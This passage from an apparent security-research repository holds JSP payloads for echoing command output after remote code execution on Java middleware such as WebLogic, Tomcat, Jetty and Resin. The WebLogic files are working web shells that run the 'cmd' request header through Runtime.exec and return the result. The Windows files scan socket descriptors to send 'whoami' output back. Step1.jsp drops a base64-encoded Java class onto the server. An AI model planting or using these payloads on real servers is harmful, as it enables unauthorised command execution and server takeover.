30 | * [https://github.com/JetBrains/jdk8u_jdk/blob/master/src/windows/native/sun/nio/ch/SocketDispatcher.c](https://github.com/JetBrains/jdk8u_jdk/blob/master/src/windows/native/sun/nio/ch/SocketDispatcher.c)
31 |
--------------------------------------------------------------------------------
/Windows/code/WindowsEcho-Deprecated.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | //准备工作&初始化
4 | java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField("fd");
5 | field.setAccessible(true);
6 |
7 | Class clazz1 = Class.forName("sun.nio.ch.Net");
8 | java.lang.reflect.Method method1 = clazz1.getDeclaredMethod("remoteAddress",java.io.FileDescriptor.class);
9 | method1.setAccessible(true);
10 |
11 | Class clazz2 = Class.forName("java.net.SocketOutputStream", false, null);
12 | java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0];
13 | constructor2.setAccessible(true);
14 |
15 | Class clazz3 = Class.forName("java.net.PlainSocketImpl");
16 | java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class});
17 | constructor3.setAccessible(true);
18 |
19 | java.lang.reflect.Method write = clazz2.getDeclaredMethod("write",new Class[]{byte[].class});
20 | write.setAccessible(true);
21 |
22 | java.net.InetSocketAddress remoteAddress = null;
23 | java.util.List list1 = new java.util.ArrayList();
24 | java.util.List list2 = new java.util.ArrayList();
25 | java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor();
26 |
27 | //第一次尝试
28 | for(int i = 0; i < 10000; i++){
29 | field.set(fileDescriptor, i);
30 |
31 | try{
32 | remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor);
33 | if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
34 | list1.add(i);
35 | }catch(Exception e){
36 | //pass
37 | }
38 | }
39 |
40 | //延迟2s
41 | Thread.sleep(2000);
42 |
43 | //第二次尝试
44 | for(int i = 0; i < 10000; i++){
45 | field.set(fileDescriptor, i);
46 |
47 | try{
48 | remoteAddress = (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor);
49 | if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
50 | list2.add(i);
51 | }catch(Exception e){
52 | //pass
53 | }
54 | }
55 |
56 | //取交集
57 | list1.retainAll(list2);
58 |
59 | for(Integer fdVal : list1){
60 | try{
61 | field.set(fileDescriptor, fdVal);
62 | Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});
63 |
64 | String res = new java.util.Scanner(Runtime.getRuntime().exec("echo \"It works!!\"").getInputStream()).useDelimiter("\\A").next();
65 | String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
66 | write.invoke(socketOutputStream, new Object[]{result.getBytes()});
67 | }catch (Exception e){
68 | //pass
69 | }
70 | }
71 | %>
--------------------------------------------------------------------------------
/Windows/code/WindowsEcho.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | if(java.io.File.separator.equals("\\")){
4 | java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField("fd");
5 | field.setAccessible(true);
6 |
7 | Class clazz1 = Class.forName("sun.nio.ch.Net");
8 | java.lang.reflect.Method method1 = clazz1.getDeclaredMethod("remoteAddress",new Class[]{java.io.FileDescriptor.class});
9 | method1.setAccessible(true);
10 |
11 | Class clazz2 = Class.forName("java.net.SocketOutputStream", false, null);
12 | java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0];
13 | constructor2.setAccessible(true);
14 |
15 | Class clazz3 = Class.forName("java.net.PlainSocketImpl");
16 | java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class});
17 | constructor3.setAccessible(true);
18 |
19 | java.lang.reflect.Method write = clazz2.getDeclaredMethod("write",new Class[]{byte[].class});
20 | write.setAccessible(true);
21 |
22 | java.net.InetSocketAddress remoteAddress = null;
23 | java.util.List list = new java.util.ArrayList();
24 | java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor();
25 | for(int i = 0; i < 50000; i++){
26 | field.set((Object)fileDescriptor, (Object)(new Integer(i)));
27 | try{
28 | remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, new Object[]{fileDescriptor});
29 | if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
30 | if(remoteAddress.toString().startsWith("/0:0:0:0:0:0:0:1")) continue;
31 | list.add(new Integer(i));
32 |
33 | }catch(Exception e){}
34 | }
35 |
36 | for(int i = list.size() - 1; i >= 0; i--){
37 | try{
38 | field.set((Object)fileDescriptor, list.get(i));
39 | Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});
40 | String[] cmd = new String[]{"cmd","/C", "whoami"};
41 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next().trim();
42 | String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + (res.length()) + "\n\n" + res + "\n\n";
43 | write.invoke(socketOutputStream, new Object[]{result.getBytes()});
44 | break;
45 | }catch (Exception e){
46 | //pass
47 | }
48 | }
49 | }
50 | %>
--------------------------------------------------------------------------------
/Windows/img/Jetty.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Windows/img/Jetty.png
--------------------------------------------------------------------------------
/Windows/img/Resin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Windows/img/Resin.png
--------------------------------------------------------------------------------
/Windows/img/Tomcat.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Windows/img/Tomcat.png
--------------------------------------------------------------------------------
/weblogic/README.md:
--------------------------------------------------------------------------------
1 | # Weblogic 回显
2 |
3 | ## 说明
4 | 代码直接搬运了 ```lufei``` 师傅的代码
5 | ## 效果
6 | 
7 | 
8 | ## 参考
9 | [weblogic_2019_2725poc与回显构造](https://xz.aliyun.com/t/5299)
10 |
--------------------------------------------------------------------------------
/weblogic/code/WeblogicEcho.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | weblogic.work.WorkAdapter adapter = ((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork();
4 | if(adapter.getClass().getName().endsWith("ServletRequestImpl")){
5 | String cmd = (String) adapter.getClass().getMethod("getHeader", String.class).invoke(adapter, "cmd");
6 |
7 | if(cmd != null && !cmd.isEmpty()){
8 | String result = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
9 | weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) adapter.getClass().getMethod("getResponse").invoke(adapter);
10 | res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
11 | res.getServletOutputStream().flush();
12 | res.getWriter().write("");
13 | }
14 | }else{
15 | java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
16 | field.setAccessible(true);
17 | Object obj = field.get(adapter);
18 | obj = obj.getClass().getMethod("getServletRequest").invoke(obj);
19 | String cmd = (String) obj.getClass().getMethod("getHeader", String.class).invoke(obj, "cmd");
20 |
21 | if(cmd != null && !cmd.isEmpty()){
22 | String result = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
23 | weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) obj.getClass().getMethod("getResponse").invoke(obj);
24 | res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
25 | res.getServletOutputStream().flush();
26 | res.getWriter().write("");
27 | }
28 | }
29 | %>
30 |
--------------------------------------------------------------------------------
/weblogic/code/weblogic-10.0.3-deprecated.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | String cmd = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getHeader("cmd");
4 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
5 | weblogic.servlet.internal.ServletResponseImpl r = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getResponse();
6 | weblogic.servlet.internal.ServletOutputStreamImpl outputStream = r.getServletOutputStream();
7 | outputStream.writeStream(new weblogic.xml.util.StringInputStream(res));
8 | outputStream.flush();
9 | response.getWriter().write("");
10 | %>
--------------------------------------------------------------------------------
/weblogic/code/weblogic-12.1.3-deprecated.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread)Thread.currentThread();
4 | java.lang.reflect.Field field = ((weblogic.servlet.provider.ContainerSupportProviderImpl.WlsRequestExecutor)executeThread.getCurrentWork()).getClass().getDeclaredField("connectionHandler");
5 | field.setAccessible(true);
6 | weblogic.servlet.internal.HttpConnectionHandler httpConn = (weblogic.servlet.internal.HttpConnectionHandler) field.get(executeThread.getCurrentWork());
7 | String cmd = "echo \"It works!\"";
8 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
9 | httpConn.getServletRequest().getResponse().getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(res));
10 | httpConn.getServletRequest().getResponse().getServletOutputStream().flush();
11 | httpConn.getServletRequest().getResponse().getWriter().write("");
12 | %>
--------------------------------------------------------------------------------
/weblogic/img/x001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/weblogic/img/x001.png
--------------------------------------------------------------------------------
/weblogic/img/x002.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/weblogic/img/x002.png
--------------------------------------------------------------------------------
/全自动挖掘 request 回显/README.md:
--------------------------------------------------------------------------------
1 | # 全自动挖掘 request 回显
2 | ## 效果
3 | 
4 | 
5 | ## 参考
6 | * [基于请求/响应对象搜索的Java中间件通用回显方法(针对HTTP)](https://blog.csdn.net/fnmsd/article/details/106709736)
7 | * [Java中间件通用回显方法的问题及处理(7.7更新)](https://blog.csdn.net/fnmsd/article/details/106890242)
8 |
--------------------------------------------------------------------------------
/全自动挖掘 request 回显/code/Step1-deprecated.jsp:
--------------------------------------------------------------------------------
1 | <%@ page import="sun.misc.BASE64Decoder" %>
2 | <%@ page import="java.io.IOException" %>
3 | <%@ page import="java.util.Arrays" %>
4 | <%@ page import="sun.misc.BASE64Encoder" %>
5 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
6 | <%
7 | String p = Thread.currentThread().getContextClassLoader().getResource("").getPath();
8 | p = java.net.URLDecoder.decode(p,"utf-8");
9 | java.io.OutputStream os = new java.io.FileOutputStream(p + "PoC.class");
10 | sun.misc.BASE64Decoder d = new sun.misc.BASE64Decoder();
11 | java.io.InputStream in = new java.io.ByteArrayInputStream(d.decodeBuffer("yv66vgAAADQAqgcAAgEAA1BvQwcABAEAEGphdmEvbGFuZy9PYmplY3QBAAFoAQATTGphdmEvdXRpbC9IYXNoU2V0OwEACVNpZ25hdHVyZQEAJ0xqYXZhL3V0aWwvSGFzaFNldDxMamF2YS9sYW5nL09iamVjdDs+OwEAAXIBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAFwAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEABjxpbml0PgEAAygpVgEABENvZGUKAAMAEQwADQAOCQABABMMAAkACgkAAQAVDAALAAwHABcBABFqYXZhL3V0aWwvSGFzaFNldAoAFgARCQABABoMAAUABgoAHAAeBwAdAQAQamF2YS9sYW5nL1RocmVhZAwAHwAgAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7CgABACIMACMAJAEAAUYBABYoTGphdmEvbGFuZy9PYmplY3Q7SSlWAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEABUxQb0M7AQABaQEAFShMamF2YS9sYW5nL09iamVjdDspWgoAFgAsDAAtACoBAAhjb250YWlucwoAFgAvDAAwACoBAANhZGQBAANvYmoBABJMamF2YS9sYW5nL09iamVjdDsBAA1TdGFja01hcFRhYmxlCgABADUMACkAKgcANwEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QKAAMAOQwAOgA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7CgA9AD8HAD4BAA9qYXZhL2xhbmcvQ2xhc3MMAEAAQQEAEGlzQXNzaWduYWJsZUZyb20BABQoTGphdmEvbGFuZy9DbGFzczspWggAQwEAA2NtZAsANgBFDABGAEcBAAlnZXRIZWFkZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwgASQEAC2dldFJlc3BvbnNlCgA9AEsMAEwATQEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsKAE8AUQcAUAEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAwAUgBTAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7BwBVAQAmamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2ULAFQAVwwAWABZAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsHAFsBABFqYXZhL3V0aWwvU2Nhbm5lcgoAXQBfBwBeAQARamF2YS9sYW5nL1J1bnRpbWUMAGAAYQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsKAF0AYwwAZABlAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwoAZwBpBwBoAQARamF2YS9sYW5nL1Byb2Nlc3MMAGoAawEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsKAFoAbQwADQBuAQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWCABwAQACXEEKAFoAcgwAcwB0AQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7CgBaAHYMAHcAeAEABG5leHQBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwoAegB8BwB7AQATamF2YS9pby9QcmludFdyaXRlcgwAfQB+AQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgoAegCADACBAA4BAAVmbHVzaAcAgwEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAFvAQAFZGVwdGgBAAFJCgA9AIgMAIkAigEAEWdldERlY2xhcmVkRmllbGRzAQAcKClbTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwoAjACOBwCNAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQMAI8AkAEADXNldEFjY2Vzc2libGUBAAQoWilWCgCMAJIMAJMAlAEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7CgA9AJYMAJcAmAEAB2lzQXJyYXkBAAMoKVoKAAEAmgwACwAkBwCcAQATW0xqYXZhL2xhbmcvT2JqZWN0OwoAPQCeDACfADsBAA1nZXRTdXBlcmNsYXNzAQAFc3RhcnQBAAFuAQARTGphdmEvbGFuZy9DbGFzczsBAA1kZWNsYXJlZEZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAAXEHAKcBABpbTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAClNvdXJjZUZpbGUBAAhQb0MuamF2YQAhAAEAAwAAAAMACAAFAAYAAQAHAAAAAgAIAAgACQAKAAAACAALAAwAAAAEAAEADQAOAAEADwAAAFwAAgABAAAAHiq3ABABswASAbMAFLsAFlm3ABizABm4ABsDuAAhsQAAAAIAJQAAABoABgAAAAwABAANAAgADgAMAA8AFgAQAB0AEQAmAAAADAABAAAAHgAnACgAAAAKACkAKgABAA8AAABWAAIAAQAAABoqxgANsgAZKrYAK5kABQSssgAZKrYALlcDrAAAAAMAJQAAAA4AAwAAABQAEAAWABgAFwAmAAAADAABAAAAGgAxADIAAAAzAAAABAACDgEACgALACQAAQAPAAABYAAGAAIAAAC/GxA0owAPsgASxgAKsgAUxgAEsSq4ADSaAKeyABLHAFESNiq2ADi2ADyZAEUqwAA2swASsgASEkK5AEQCAMcACgGzABKnACqyABK2ADgSSAO9AD22AEqyABIDvQADtgBOwABUswAUpwAIVwGzABKyABLGAEayABTGAECyABS5AFYBALsAWlm4AFyyABISQrkARAIAtgBitgBmtwBsEm+2AHG2AHW2AHmyABS5AFYBALYAf6cABFexKhsEYLgAIbEAAgBHAGYAaQCCAHoAsgC1AIIAAwAlAAAASgASAAAAGwASABwAEwAeABoAHwAsACAAMwAhAEAAIgBEACMARwAlAGYAJgBqACcAbgAsAHoALgCnAC8AsgAwALYAMgC3ADUAvgA3ACYAAAAWAAIAAAC/AIQAMgAAAAAAvwCFAIYAAQAzAAAAEwAJEgAzYQcAggT3AEYHAIIAAAYACgAjACQAAQAPAAABpgACAAwAAAB+KrYAOE0stgCHWToGvjYFAzYEpwBbGQYVBDJOLQS2AIsBOgctKrYAkToHGQe2ADi2AJWaAAwZBxu4AJmnAC8ZB8AAm1k6C742CgM2CacAExkLFQkyOggZCBu4AJmECQEVCRUKof/spwAEV4QEARUEFQWh/6QstgCdWU3H/4uxAAEAIwBmAGkAggADACUAAAA+AA8AAAA5AAUAOwAbADwAIAA9ACMAPwAqAEEANQBCADsAQwA+AEQAVgBFAFwARABmAEkAagA7AHQATAB9AE0AJgAAAD4ABgAAAH4AoAAyAAAAAAB+AIUAhgABAAUAeQChAKIAAgAbAE8AowCkAAMAIwBHAIQAMgAHAFYABgClADIACAAzAAAAhgAI/AAFBwA9/wAPAAcHAAMBBwA9AAEBBwCmAAD/ACgACAcAAwEHAD0HAIwBAQcApgcAAwAA/wAQAAwHAAMBBwA9BwCMAQEHAKYHAAMAAQEHAJsAAA//AAkACAcAAwEHAD0HAIwBAQcApgcAAwABBwCC/wAAAAcHAAMBBwA9AAEBBwCmAAACAAEAqAAAAAIAqQ=="));
12 |
13 | byte[] f = new byte[1024];
14 | int l = 0;
15 | while((l=in.read(f))!=-1){
16 | os.write(f, 0, l);
17 | }
18 | in.close();
19 | os.close();
20 |
21 | // String p = Thread.currentThread().getContextClassLoader().getResource("").getPath();
22 | // p = java.net.URLDecoder.decode(p,"utf-8");
23 | // java.io.OutputStream os = new java.io.FileOutputStream(p + "PoC.class");
24 | // String content = "yv66vgAAADQAqgcAAgEAA1BvQwcABAEAEGphdmEvbGFuZy9PYmplY3QBAAFoAQATTGphdmEvdXRpbC9IYXNoU2V0OwEACVNpZ25hdHVyZQEAJ0xqYXZhL3V0aWwvSGFzaFNldDxMamF2YS9sYW5nL09iamVjdDs+OwEAAXIBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAFwAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEABjxpbml0PgEAAygpVgEABENvZGUKAAMAEQwADQAOCQABABMMAAkACgkAAQAVDAALAAwHABcBABFqYXZhL3V0aWwvSGFzaFNldAoAFgARCQABABoMAAUABgoAHAAeBwAdAQAQamF2YS9sYW5nL1RocmVhZAwAHwAgAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7CgABACIMACMAJAEAAUYBABYoTGphdmEvbGFuZy9PYmplY3Q7SSlWAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEABUxQb0M7AQABaQEAFShMamF2YS9sYW5nL09iamVjdDspWgoAFgAsDAAtACoBAAhjb250YWlucwoAFgAvDAAwACoBAANhZGQBAANvYmoBABJMamF2YS9sYW5nL09iamVjdDsBAA1TdGFja01hcFRhYmxlCgABADUMACkAKgcANwEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QKAAMAOQwAOgA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7CgA9AD8HAD4BAA9qYXZhL2xhbmcvQ2xhc3MMAEAAQQEAEGlzQXNzaWduYWJsZUZyb20BABQoTGphdmEvbGFuZy9DbGFzczspWggAQwEAA2NtZAsANgBFDABGAEcBAAlnZXRIZWFkZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwgASQEAC2dldFJlc3BvbnNlCgA9AEsMAEwATQEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsKAE8AUQcAUAEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAwAUgBTAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7BwBVAQAmamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2ULAFQAVwwAWABZAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsHAFsBABFqYXZhL3V0aWwvU2Nhbm5lcgoAXQBfBwBeAQARamF2YS9sYW5nL1J1bnRpbWUMAGAAYQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsKAF0AYwwAZABlAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwoAZwBpBwBoAQARamF2YS9sYW5nL1Byb2Nlc3MMAGoAawEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsKAFoAbQwADQBuAQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWCABwAQACXEEKAFoAcgwAcwB0AQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7CgBaAHYMAHcAeAEABG5leHQBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwoAegB8BwB7AQATamF2YS9pby9QcmludFdyaXRlcgwAfQB+AQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgoAegCADACBAA4BAAVmbHVzaAcAgwEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAFvAQAFZGVwdGgBAAFJCgA9AIgMAIkAigEAEWdldERlY2xhcmVkRmllbGRzAQAcKClbTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwoAjACOBwCNAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQMAI8AkAEADXNldEFjY2Vzc2libGUBAAQoWilWCgCMAJIMAJMAlAEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7CgA9AJYMAJcAmAEAB2lzQXJyYXkBAAMoKVoKAAEAmgwACwAkBwCcAQATW0xqYXZhL2xhbmcvT2JqZWN0OwoAPQCeDACfADsBAA1nZXRTdXBlcmNsYXNzAQAFc3RhcnQBAAFuAQARTGphdmEvbGFuZy9DbGFzczsBAA1kZWNsYXJlZEZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAAXEHAKcBABpbTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAClNvdXJjZUZpbGUBAAhQb0MuamF2YQAhAAEAAwAAAAMACAAFAAYAAQAHAAAAAgAIAAgACQAKAAAACAALAAwAAAAEAAEADQAOAAEADwAAAFwAAgABAAAAHiq3ABABswASAbMAFLsAFlm3ABizABm4ABsDuAAhsQAAAAIAJQAAABoABgAAAAwABAANAAgADgAMAA8AFgAQAB0AEQAmAAAADAABAAAAHgAnACgAAAAKACkAKgABAA8AAABWAAIAAQAAABoqxgANsgAZKrYAK5kABQSssgAZKrYALlcDrAAAAAMAJQAAAA4AAwAAABQAEAAWABgAFwAmAAAADAABAAAAGgAxADIAAAAzAAAABAACDgEACgALACQAAQAPAAABYAAGAAIAAAC/GxA0owAPsgASxgAKsgAUxgAEsSq4ADSaAKeyABLHAFESNiq2ADi2ADyZAEUqwAA2swASsgASEkK5AEQCAMcACgGzABKnACqyABK2ADgSSAO9AD22AEqyABIDvQADtgBOwABUswAUpwAIVwGzABKyABLGAEayABTGAECyABS5AFYBALsAWlm4AFyyABISQrkARAIAtgBitgBmtwBsEm+2AHG2AHW2AHmyABS5AFYBALYAf6cABFexKhsEYLgAIbEAAgBHAGYAaQCCAHoAsgC1AIIAAwAlAAAASgASAAAAGwASABwAEwAeABoAHwAsACAAMwAhAEAAIgBEACMARwAlAGYAJgBqACcAbgAsAHoALgCnAC8AsgAwALYAMgC3ADUAvgA3ACYAAAAWAAIAAAC/AIQAMgAAAAAAvwCFAIYAAQAzAAAAEwAJEgAzYQcAggT3AEYHAIIAAAYACgAjACQAAQAPAAABpgACAAwAAAB+KrYAOE0stgCHWToGvjYFAzYEpwBbGQYVBDJOLQS2AIsBOgctKrYAkToHGQe2ADi2AJWaAAwZBxu4AJmnAC8ZB8AAm1k6C742CgM2CacAExkLFQkyOggZCBu4AJmECQEVCRUKof/spwAEV4QEARUEFQWh/6QstgCdWU3H/4uxAAEAIwBmAGkAggADACUAAAA+AA8AAAA5AAUAOwAbADwAIAA9ACMAPwAqAEEANQBCADsAQwA+AEQAVgBFAFwARABmAEkAagA7AHQATAB9AE0AJgAAAD4ABgAAAH4AoAAyAAAAAAB+AIUAhgABAAUAeQChAKIAAgAbAE8AowCkAAMAIwBHAIQAMgAHAFYABgClADIACAAzAAAAhgAI/AAFBwA9/wAPAAcHAAMBBwA9AAEBBwCmAAD/ACgACAcAAwEHAD0HAIwBAQcApgcAAwAA/wAQAAwHAAMBBwA9BwCMAQEHAKYHAAMAAQEHAJsAAA//AAkACAcAAwEHAD0HAIwBAQcApgcAAwABBwCC/wAAAAcHAAMBBwA9AAEBBwCmAAACAAEAqAAAAAIAqQ==";
25 | // BASE64Decoder decoder = new BASE64Decoder();
26 | // byte[] bytes = decoder.decodeBuffer(content);
27 | //
28 | // int length = bytes.length;
29 | // int start = 0;
30 | // int end = 0;
31 | // BASE64Encoder encoder = new BASE64Encoder();
32 | // while(start < length){
33 | // end = (start + 1000 > length) ? (end + 1000) : length;
34 | // byte[] temp = Arrays.copyOfRange(bytes, start, end);
35 | // start = end;
36 | //
37 | // String part = encoder.encode(temp).replaceAll("\r|\n|\r\n", "");
38 | // sun.misc.BASE64Decoder d = new sun.misc.BASE64Decoder();
39 | // java.io.InputStream in = new java.io.ByteArrayInputStream(d.decodeBuffer(part));
40 | //
41 | // byte[] f = new byte[1024];
42 | // int l = 0;
43 | // while((l=in.read(f))!=-1){
44 | // os.write(f, 0, l);
45 | // }
46 | // in.close();
47 | // os.close();
48 | // }
49 | %>
--------------------------------------------------------------------------------
/全自动挖掘 request 回显/code/Step1.jsp:
--------------------------------------------------------------------------------
1 | <%@ page import="sun.misc.BASE64Decoder" %>
2 | <%@ page import="java.io.IOException" %>
3 | <%@ page import="java.util.Arrays" %>
4 | <%@ page import="sun.misc.BASE64Encoder" %>
5 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
6 | <%
7 | try {
8 | String path;
9 | if (java.io.File.separator.equals("/")) {
10 | path = "/tmp/";
11 | } else {
12 | path = "c:/windows/temp/";
13 | }
14 |
15 | java.io.OutputStream os = new java.io.FileOutputStream(path + "PoC.class");
